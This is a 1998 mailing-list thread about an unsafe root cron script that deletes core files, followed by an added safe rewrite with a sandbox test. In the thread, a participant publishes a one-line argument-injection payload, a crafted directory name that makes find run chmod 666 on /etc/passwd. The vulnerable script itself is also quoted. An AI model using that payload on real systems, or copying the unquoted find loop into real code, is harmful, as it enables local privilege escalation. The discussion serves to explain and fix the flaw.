>> In <199810260025.TAA13771@alcove.wittsend.com> Michael H. Warfield (mhw@wittsend.com) wrote:
>> MW> Khimenko Victor enscribed thusly:
>> >> 25-Oct-98 20:01 you wrote:
>> >> > Hi Michael.
>>
>> >> >>> % Already tried, and he's not interested, but I did find out what script
>> >> >>> % he's using...
>> >> >>> %
>> >> >>> % Q> #!/bin/sh
>> >> >>> % Q> XYZZY="`find / -name core`"
>> >> >>> % Q> for LOOP in `find $XYZZY | sort -ru` ; do
>> >> >>> % Q> rm -fr $LOOP
>> >> >>> % Q> done
>>
HO> <Lots snipped>
>> Uh, oh, ah. If you are THAT serious then send me (privately if you do not want to
>> create troubles from publishing such an exploit -- I'll not distribute it)
>> an exploit of THIS SCRIPT (not my bash, my glibc or my perl but an exploit of THIS
>> SCRIPT; that is, an exploit which is not possible without executing this script
>> every hour -- something like mkdir -p "/tmp /dev /core") which will make my
>> /etc/passwd world-writable.
HO> You asked for an exploit of that exact script, here's one that works
HO> mkdir -p ' -exec chmod 666 /etc/passwd ; -o -name /core'
HO> You don't need any shell metachars to make it execute any command you
HO> want.
Oops. I forgot about the problem with the second find's parameters :-(( Shit. Yes.
Even if the script is really immune to metacharacters (and here I am right after
all :-) it's still vulnerable via the good old trick with parameters (this trick
was used in so many places so many times in different variations and still
sometimes it's hard to remember it - shame on me). Good work.
P.S. But I'm still not sure if it was a wise idea to publish this on the list :-((
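As an added example (not code from the thread or any of its participants), here is a cleanup that does the same job without ever feeding find's output back to a second find or to the shell, plus a small audit helper for the kind of names that trip the original loop. It assumes a POSIX find with `-exec ... {} +` and a `mktemp -d`; the sandbox it builds is constructed for the demonstration.

```shell
#!/bin/sh
# Added example, not code from the thread: a core-file cleanup that is immune to
# the argument-injection trick above, plus an audit helper. Assumes POSIX find.

# Safe cleanup: find hands each matching path to rm as one argument. Nothing is
# re-read by the shell or by a second find, so spaces, newlines, or a leading
# '-' in a path are plain data, never a predicate or a command.
safe_core_cleanup() {
    root=$1
    find "$root" -type f -name core -exec rm -f -- {} +
}

# Audit helper: list names with whitespace or a leading '-', the kind that the
# unquoted `find $XYZZY` loop in the original script would re-parse as options.
suspicious_names() {
    root=$1
    find "$root" \( -name '-*' -o -name '*[[:space:]]*' \) -print
}

# Constructed sandbox mirroring the hostile layout from the thread, with a
# harmless marker file standing in for the chmod on /etc/passwd.
make_sandbox() {
    sb=$(mktemp -d) || return 1
    hostile="$sb/ -exec touch $sb/marker ; -o -name "
    mkdir -p "$hostile/core" "$sb/plain"
    : > "$hostile/core/core"   # real core file inside the hostile directory
    : > "$sb/plain/core"       # real core file in an ordinary directory
    : > "$sb/plain/keep.txt"   # unrelated file that must survive
    printf '%s\n' "$sb"
}

# Returns 0 when the cleanup removed every core file, kept keep.txt, and ran
# nothing from the hostile name (no marker file appeared).
check_cleanup() {
    sb=$(make_sandbox) || return 1
    safe_core_cleanup "$sb"
    rc=0
    [ ! -e "$sb/plain/core" ]   || rc=1
    [ ! -e "$sb/marker" ]       || rc=1
    [ -e "$sb/plain/keep.txt" ] || rc=1
    find "$sb" -type f -name core | grep -q . && rc=1
    rm -rf "$sb"
    return "$rc"
}
```

Running `check_cleanup` exits 0 on a system where the hostile directory name is left as inert data; `suspicious_names /` is a quick way to see whether such names already exist where a cron job walks.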